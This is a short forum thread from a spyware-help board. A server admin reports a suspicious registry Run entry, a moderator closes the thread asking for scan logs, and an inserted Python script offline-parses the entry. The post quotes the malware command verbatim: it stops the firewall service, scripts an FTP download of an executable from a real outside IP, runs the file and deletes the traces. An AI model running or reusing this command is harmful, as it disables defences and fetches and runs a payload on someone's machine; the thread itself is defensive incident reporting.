Spyware Warrior Help with Spyware, Hijacking & Other Internet Nuisances
paulrw (Newbie)
Joined: 05 Mar 2012 | Last Visit: 05 Mar 2012 | Posts: 1 | Location: Liverpool England
Posted: Mon Mar 05, 2012 6:52 am | Post subject: suspect infection
Logging on to a client's server today, I noticed a command window appear briefly. Hunting it down, I found this in the registry (HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run)
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 210.76.97.212> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get x.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&x.exe&x.exe&del cmd.txt /q /f&exi
which looks to me to be creating a command file to download and run a program, deleting itself after running. This is not found by antivirus/malware programs I have run. Anyone know of it, and anything else it may have left about the place?
I don't know if this is the correct place to post this, but it seems that if you don't know of it, maybe you should! The FTP site resolves to an address in China. I have deleted the registry key. I have also found some spurious users on the system with admin rights, so I presume this program is creating a backdoor to the system.
_________________
Paul Wilkie
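An offline breakdown of the Run value quoted in the post above, added here as an example and not part of the original thread: it splits the cmd.exe chain on `&` without executing anything, rebuilds the FTP script that the echo steps write, and lists the fragments that do not parse (the value is cut off as posted). The function names are hypothetical.

```python
import re

# Run value copied verbatim from the post above (truncated as posted).
RUN_VALUE = (
    r"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 210.76.97.212> cmd.txt"
    r"&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get x.exe >> cmd.txt"
    r"&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&x.exe&x.exe&del cmd.txt /q /f&exi"
)

SERVICE_STOP = re.compile(r"^net1?\s+stop\s+(\S+)", re.I)
ECHO_REDIRECT = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp(?:\.exe)?\s+.*-s:(\S+)", re.I)
BARE_EXE = re.compile(r"^[\w.\\:-]+\.exe$", re.I)

def analyse_run_value(value):
    """Describe what a cmd.exe /c chain would do; nothing is executed."""
    chain = re.split(r"\s/c\s+", value, maxsplit=1, flags=re.I)[-1]
    files = {}  # file name -> lines the echo steps would write into it
    report = {"stopped_services": [], "ftp_scripts": {}, "executed": [],
              "deleted": [], "unparsed": []}
    for step in (s.strip() for s in chain.split("&")):
        if m := SERVICE_STOP.match(step):
            report["stopped_services"].append(m.group(1).lower())
        elif m := ECHO_REDIRECT.match(step):
            text, op, name = m.groups()
            if op == ">":  # '>' truncates the file, '>>' appends to it
                files[name] = []
            files.setdefault(name, []).append(text)
        elif m := FTP_SCRIPT.match(step):
            # Snapshot the script as it exists when ftp reads it.
            report["ftp_scripts"][m.group(1)] = list(files.get(m.group(1), []))
        elif step.lower().startswith("del "):
            report["deleted"].append(step.split()[1])
        elif BARE_EXE.match(step):
            report["executed"].append(step)
        elif step:
            report["unparsed"].append(step)  # garbled or cut-off fragments
    return report

def ftp_indicators(script_lines):
    """Return (remote host, fetched files) from a reconstructed ftp -s: script."""
    host = next((l.split()[1] for l in script_lines if l.lower().startswith("open ")), None)
    fetched = [l.split()[1] for l in script_lines if l.lower().startswith("get ")]
    return host, fetched

if __name__ == "__main__":
    result = analyse_run_value(RUN_VALUE)
    for name, lines in result["ftp_scripts"].items():
        print(name, ftp_indicators(lines), lines)
    print({k: v for k, v in result.items() if k != "ftp_scripts"})
```

In the rebuilt script the two `123` lines are the answers to the FTP client's user and password prompts, and `sharedaccess` is the service name of Windows Firewall/ICS on Windows XP and Server 2003.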
Cypher (Moderator)
Joined: 05 Jul 2009 | Last Visit: 17 May 2013 | Posts: 4041 | Location: Land Of The Leprechauns
Posted: Mon Mar 05, 2012 7:04 am | Post subject:
By posting just a description of your problems it is likely that your post will be passed by and you will not receive the help you're looking for.
We need to know what's running on your computer so that we can give you appropriate instructions, and this information is provided by DDS logs.
This thread will now be closed.
If you still need help, please start a new thread with:-
- DDS logs.
- Details of the problems you're experiencing.
- Any messages or error codes you may have got.
If for any reason you can't run DDS, please let us know in your post.
Details for running a DDS scan can be found HERE
_________________
Admin/Teacher at Malware Removal University